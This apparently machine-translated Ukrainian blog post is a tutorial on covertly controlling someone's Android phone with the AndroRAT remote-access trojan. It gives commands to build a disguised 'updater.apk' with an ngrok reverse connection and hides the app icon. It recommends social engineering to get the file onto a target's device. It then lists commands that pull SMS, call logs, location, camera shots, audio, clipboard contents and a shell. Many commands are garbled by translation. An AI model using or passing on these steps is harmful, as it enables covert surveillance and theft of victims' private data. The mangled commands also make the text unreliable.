# lane **Published by:** [Сontinental](https://paragraph.com/@ontinental/) **Published on:** 2023-09-08 **URL:** https://paragraph.com/@ontinental/lane-2 ## Content спосіб віддаленого контролю телефону за допомогою AndroRAT та Kali Linux. Для віддаленого контролю телефону потрібно: Встановить АндроРАТ на Kali Linux. Встановити та налаштувати ngrok. Створити корисне навантаження (файл .apk, що виконується). Встановити apk файл на цільовий пристрій. Віддалений контроль телефону за допомогою AndroRAT AndroRAT (Remote Access Tool/Trojan. AndroRAT) – призначений для віддаленого керування телефоном Android. Це клієнт-серверна програма, розроблена на Java Android для клієнтської частини, а серверна частина написана на Python. Інструмент працюватиме на пристроях від Android 4.1 (Jellybean), Android 9 (Oreo), (від API 16 до API 28). Цей RAT може бути встановлений на Android 10 і вище , але деякі команди для отримання інформації можуть працювати не зовсім стабільно. Можливості AndroRAT: Бекдор (автоматичне підключення). Невидимий значок після встановлення. Використовує мінімальні ресурси пристрою. Автоматичний запуск після перезавантаження смартфона. Можливість робити знімки з обох камер Аудіо запис з мікрофона. Перегляд журналу дзвінків та SMS. Отримання поточного розташування. Інформація про SIM-картку, IP-адресу та MAC-адресу пристрою. Як встановити AndroRAT на Kali Linux Для роботи Андроїд потрібен Python3. Для встановлення Python3 на Kali, використовуйте команду: sudo apt встановити python3 python3 - pip Тепер необхідно встановити Java OpenJDK: Зайдіть на офіційний сайт Oracle, створіть обліковий запис Oracle і увійдіть за допомогою даних облікового запису. Після реєстрації та входу в систему перейдіть на сторінку завантаження OpenJDK . Перейдіть вниз і знайдіть версію OpenJDK 8. Позначивши галочкою ліцензійну угоду, натисніть посилання jdk-8u321-linux-x64.tar.gz . Після закінчення завантаження відкрийте термінал і зайдіть в /usr/lib/jvm: cd / usr / lib / jvm Якщо в системі не встановлені інші версії Java, тоді доведеться створити каталог jvm /usr/lib: sudo mkdir - p / usr / lib / jvm Вийміть архів OpenJDK: sudo tar - xvzf ~ / Завантаження / jdk - 8 u321 - linux - x64 . дьоготь . gz Після вилучення файлів, перейдіть до каталогу jdk1.8.0_321 : cd jdk1 . 8,0 _321 Тепер необхідно змінити змінні середовища Java за допомогою текстового редактора (у моєму випадку використовується текстовий редактор Nano): sudo nano / etc / середовище На скрині вище видно, деякі шляхи вже встановлені. Додати інші використовуючи символ : : /usr/lib/jvm/jdk1.8.0_321/bin:/usr/lib/jvm/jdk1.8.0_321/db/bin:/usr/lib/jvm/jdk1.8.0_321/jre/bin Збережіть зміни за допомогою клавіш «CTRL+X», потім «Y» та «Enter». Встановіть OpenJDK 8 як альтернативу: sudo update - альтернативи -- встановити "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_321/bin/java" 0 Встановіть компілятор Java: sudo update - альтернативи -- встановити "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_321/bin/javac" 0 Тепер можна встановити Java OpenJDK 8: sudo update - alternatives — встановити java / usr / lib / jvm / jdk1 . 8.0 _321 / bin / java Для компілятора Java використовуйте команду: sudo update - alternatives — встановити java / usr / lib / jvm / jdk1 . 8.0 _321 / bin / javac Виведення цих команд показано на наступному знімку екрана: Виберіть версію Java (зробити це можна з будь-якого каталогу): sudo update - альтернативи -- config java На наведеному вище знімку екрана ви побачите, що версія Java 8 знаходиться під номером 2 , а версія Java 11 – під номером 0 . Щоб переключитися між версіями, виберіть відповідний номер. У моєму випадку - це 2 : Добре, тепер у нас використовується Java 8, йдемо далі! Наступний крок - клонування (установка) AndroRAT на Kali: git clone https : // github . com / karma9874 / AndroRAT Переходимо до каталогу AndroRAT за допомогою команди mv: Встановлюємо залежності AndroRAT: Вимоги pip3 install - r . txt Після цього потрібно встановити ngrok та встановити токен аутентифікації ngrok. Для створення файлу APK потрібно виконати команду: python3 androRAT . py -- build -- ngrok - p 8888 - o ~ / Desktop / updater . apk Аргумент --build , що використовується в команді, використовує скрипт python androRAT.py і створює корисне навантаження (файл .apk). Аргумент -ngrok використовується для віддаленого підключення через ngrok. У локальній мережі можна використовувати ngrok і запустити команду з параметром -i. Після чого буде запущено слухача, який очікує зворотного підключення. Для вибору іконки програми можна використати аргумент --icon . У моєму випадку я хочу отримати прихований віддалений доступ до смартфону, тому пропускаю це налаштування. Параметр -o відповідає за вибір порту та розташування файлу .apk. На скрині вище бачимо, що AndroRAT створює і підписує файл .apk. Після створення файлу буде запущено прослуховувач, який очікує підключення: Тепер можна надіслати apk файл на смартфон. Якщо у вас немає фізичного доступу до пристрою, тоді можна застосувати методи соціальної інженерії . Як використовувати AndroRAT на Kali Linux Наприклад, встановимо АндроРАТ на свій персональний планшет. Після встановлення файлу на цільовому пристрої ви побачите наступне повідомлення в терміналі Kali: З'єднання встановлено. Тепер для взаємодії з програмою будемо використовувати команди: deviceInfo – основна інформація про пристрій. camList – ідентифікатор камери. takepic [ідентифікатор камери] – знімок з камери. startVideo [ID камери] — запис відео. stopVideo — Зупинити запис відео та відкрити відеофайл. startAudio — запись звука. stopAudio — Зупинити запис звуку. getSMS [inbox|sent] - вхідні / надіслані смс. getCallLogs - історія дзвінків. shell – запуск оболонки sh. vibrate [количество_раз] — вибрация. getLocation — розташування пристрою. getIP — ip-пристрої. getSimDetails - інформація про всі sim-картки. clear – очищення екрана. getClipData – дані з буфера обміну. getMACAddress — mac-адреса пристрою. exit – вихід. Наприклад, для отримання всіх SMS запустимо команду getSMS: На скрині вище, можете бачити, як були отримані всі SMS та збережені у файл .txt, в каталозі «Dumps» Так само, якщо ми хочемо зробити знімок з камери, потрібно запустити команду camList . Після цього з'явиться список усіх камер телефону. Потім можна зробити знімок за допомогою команди takepic [ номер камери ] ## Publication Information - [Сontinental](https://paragraph.com/@ontinental/): Publication homepage - [All Posts](https://paragraph.com/@ontinental/): More posts from this publication - [RSS Feed](https://api.paragraph.com/blogs/rss/@ontinental): Subscribe to updates